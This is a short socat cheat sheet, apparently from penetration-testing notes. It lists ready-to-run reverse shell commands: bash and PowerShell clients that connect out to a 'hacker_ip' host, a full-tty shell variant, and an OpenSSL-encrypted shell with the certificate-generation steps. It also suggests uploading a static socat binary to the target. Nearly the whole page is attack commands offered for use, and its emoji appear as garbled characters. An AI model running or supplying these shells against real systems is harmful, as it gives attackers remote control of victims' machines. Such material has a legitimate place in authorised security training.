socat
socat is a command similar to netcat. Similarely to other wrappers, it can be used for a client or a server, but with socat, you will mostly use a wrapper for both sides.
β‘οΈ Add -d -d
for debug information.
π₯ On the target, you can upload a static binary of socat as the command/executable is most likely not present.
TCP shell - stdin
Linux server
$ socat TCP-L:port -
$ socat TCP-LISTEN:port STDOUT # same
Linux/Windows Client
$ socat TCP:hacker_ip:port EXEC:"bash -li"
PS> socat TCP:hacker_ip:port EXEC:powershell.exe,pipes
TCP shell - tty
Linux server
$ socat TCP-L:port FILE:`tty`,raw,echo=0
Linux client
$ socat TCP:hacker_ip:port EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Encrypted shell π₯
You first need to generate a certificate:
$ openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
$ cat shell.key shell.crt > shell.pem
Linux server
$ socat OPENSSL-LISTEN:port,cert=shell.pem,verify=0 [...]
Linux client
$ socat OPENSSL:hacker_ip:port,verify=0 [...]